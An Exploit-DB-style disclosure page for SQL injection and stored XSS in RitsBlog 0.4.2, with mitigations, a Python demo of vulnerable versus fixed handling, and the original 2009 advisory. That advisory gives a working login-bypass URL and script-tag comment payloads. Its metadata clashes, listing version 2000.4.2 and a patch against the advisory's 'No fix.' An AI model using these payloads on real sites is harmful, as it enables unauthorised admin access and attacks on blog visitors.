vendor:
RitsBlog
by:
Salvatore "drosophila" Fresta
8.8
CVSS
HIGH
SQL Injection and XSS Persistent
89, 79
CWE
Product Name: RitsBlog
Affected Version From: 2000.4.2
Affected Version To: 2000.4.2
Patch Exists: YES
Related CWE: N/A
CPE: a:ritsblog:ritsblog:0.4.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

RitsBlog 0.4.2 SQL Injection and XSS Persistent Vulnerabilities

RitsBlog 0.4.2 is vulnerable to SQL Injection and persistent (stored) XSS. The SQL Injection vulnerability is in the login function of ritsBlogAdmin.class.php, which interpolates the user-supplied password directly into the query without escaping or parameter binding; an attacker can exploit it by sending a crafted request containing SQL syntax in the password value. The persistent XSS vulnerability is in the addComment function of the same file, which only applies addslashes() (SQL quote escaping) to the comment name and body and never HTML-encodes them, so JavaScript submitted in a comment is stored and later rendered to every visitor of the post.

Mitigation:

The SQL Injection vulnerability can be fixed by escaping the password in ritsBlogAdmin.class.php before it is placed in the query: $password = mysql_real_escape_string($password). The persistent XSS vulnerability can be fixed by HTML-encoding the comment fields in ritsBlogAdmin.class.php before they are stored: $name = htmlspecialchars($name); $body = htmlspecialchars($body).
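The two defects and the effect of the mitigations above, reproduced as an added example (not code from RitsBlog or the advisory): the login query is rebuilt against an in-memory SQLite table with a constructed users row, and the comment handling contrasts addslashes-style escaping with htmlspecialchars-style encoding. The parameterized query is a stand-in for the escaping fix; the table layout is an assumption, since the page only shows the secretWord column.

```python
import html
import sqlite3

# Constructed sample data standing in for RitsBlog's users table
# (assumption: only the secretWord column is known from the advisory).
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, secretWord TEXT)")
    db.execute("INSERT INTO users (secretWord) VALUES ('correct-horse')")
    return db

def login_vulnerable(db: sqlite3.Connection, password: str) -> bool:
    # Mirrors the advisory's login(): the password is pasted straight into
    # the SQL text, so quote characters rewrite the WHERE clause.
    sql = f"select * from users where secretWord = '{password}'"
    return db.execute(sql).fetchone() is not None

def login_fixed(db: sqlite3.Connection, password: str) -> bool:
    # Parameter binding keeps the value out of the SQL text entirely.
    sql = "select * from users where secretWord = ?"
    return db.execute(sql, (password,)).fetchone() is not None

def store_name_vulnerable(name: str) -> str:
    # Equivalent of PHP addslashes(): backslash-escapes quotes for the INSERT,
    # but leaves angle brackets intact, so the stored comment is live HTML.
    return name.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def store_name_fixed(name: str) -> str:
    # Equivalent of PHP htmlspecialchars(): markup becomes inert entities.
    return html.escape(name, quote=True)

def demo() -> dict:
    db = make_db()
    bypass = "1'or'1'='1"                     # bypass string from the advisory
    xss = "<script>alert('XSS');</script>"    # payload from the advisory
    return {
        "vuln_accepts_bypass": login_vulnerable(db, bypass),
        "fixed_rejects_bypass": not login_fixed(db, bypass),
        "fixed_accepts_real_password": login_fixed(db, "correct-horse"),
        "addslashes_keeps_script_tag": "<script>" in store_name_vulnerable(xss),
        "htmlspecialchars_neutralises": "<script>" not in store_name_fixed(xss),
    }

if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```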
Source

Exploit-DB raw data:

*******   Salvatore "drosophila" Fresta   *******

[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/

[+] Bugs: [A] SQL Injection
          [B] XSS Persistent

[+] Exploitation: Remote
[+] Date: 02 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

- [1] Bugs
- [2] Code
- [3] Fix


*************************************************

[+] Bugs

- [A] SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php

This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.

In jobs.php:

if ($_GET[j] == "login"){
     if ($blog -> login($_GET[p])){
         $_SESSION[loggedin] = "ok";
         $_SESSION[userID] = $blog -> userID;
         echo "Password found. Loging in...";
         ....

In ritsBlogAdmin.class.php:

function login($password){
         global $db;
         $sql = "select * from users where secretWord  = '$password'";
         ...
}


- [B] XSS Persistent

[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php

In jobs.php:

if ($_POST[j] == "addComment"){
         echo $blog -> addComment($_POST[id], $_POST[name], $_POST[body]);
}

In ritsBlogAdmin.class.php:

function addComment($id, $name, $body){
         global $db;
         $sql = "INSERT INTO comments (name, postID, date, text)
                 VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" . addslashes($body) . "')";
         ...
}


*************************************************

[+] Code

- [A] SQL Injection

http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1


- [B] XSS Persistent

It is possible to use the forms in index.php, or to send
the following values over the POST method:

?j=addComment&id=54&name=myname&body=<script>alert('XSS');</script>

or

?j=addComment&id=54&name=<script>alert('XSS');</script>&body=body


*************************************************

[+] Fix

No fix.


*************************************************

-- Salvatore "drosophila" Fresta CWNP444351 

# milw0rm.com [2009-03-02]